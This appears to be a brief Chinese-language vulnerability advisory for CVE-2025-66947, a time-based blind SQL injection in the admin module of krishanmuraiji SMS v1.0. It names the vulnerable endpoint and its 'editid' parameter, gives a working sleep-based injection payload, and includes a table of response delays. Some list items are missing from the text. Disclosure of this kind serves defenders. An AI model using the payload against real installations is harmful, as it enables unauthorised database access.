⏱️ 视觉效果对比:正常响应 vs 约6秒延迟响应
TL;DR: 管理员模块中的GET参数通过响应延迟实现了基于时间的SQL注入。
在 krishanmuraiji SMS v1.0 中存在一个基于时间的盲SQL注入漏洞,原因是管理模块中一个GET参数未经过恰当的验证。
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Payload | 延迟 |
|---|---|
sleep(3) | ~3秒 |
sleep(6) | ~6秒 |
sleep(15) | ~15秒 |
延迟一致 = SQL注入确认
此漏洞模式常见于:
即使需要身份验证且错误信息被隐藏, 基于时间的SQL注入仍然可被利用且危险。
严重性: 高
CVE-2025-66947
Ranjan Kumar本PoC仅用于教育和防御目的。
CVE-2025-66947, SQL注入, 基于时间的盲SQL注入, PHP, 管理面板